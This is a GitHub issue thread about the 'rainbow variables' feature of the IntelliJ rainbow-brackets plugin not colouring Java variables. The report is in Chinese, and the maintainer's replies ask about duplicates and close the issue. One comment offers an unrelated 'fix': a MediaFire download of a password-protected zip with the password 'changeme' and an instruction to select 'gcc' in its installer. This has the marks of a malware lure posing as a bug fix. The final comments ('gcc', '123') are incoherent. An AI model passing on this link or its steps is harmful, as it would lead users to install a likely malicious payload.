### ISSUE TITLE
Enable rainbow variables 不起作用

### ISSUE THREAD

**Issue by wangzhihui22** [izhangzhihao/intellij-rainbow-brackets#2768]
### Have you checked the issues and discussions to ensure there are no duplicates?

Yes

### Your programming languages

java

### Free or paid?

Paid users

### Expected Behavior

变量显示不用颜色

### Current Behavior

不显示颜色

### Code snippet for reproduce

```shell
-
```

### Your Environment

![image](https://github.com/user-attachments/assets/253e2cc6-207f-43c8-9e45-97e734f32fca)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by izhangzhihao** [comment]
Might duplicate with #2762 pls check

**Comment by izhangzhihao** [comment]
make sure you searched before you raise  a new one. If you did searched, pls tell me what did you tried.

**Comment by izhangzhihao** [comment]
Closed since no update.

**Comment by izhangzhihao** [comment]
gcc

**Comment by izhangzhihao** [comment]
123

**Comment by izhangzhihao** [comment]
123gcc
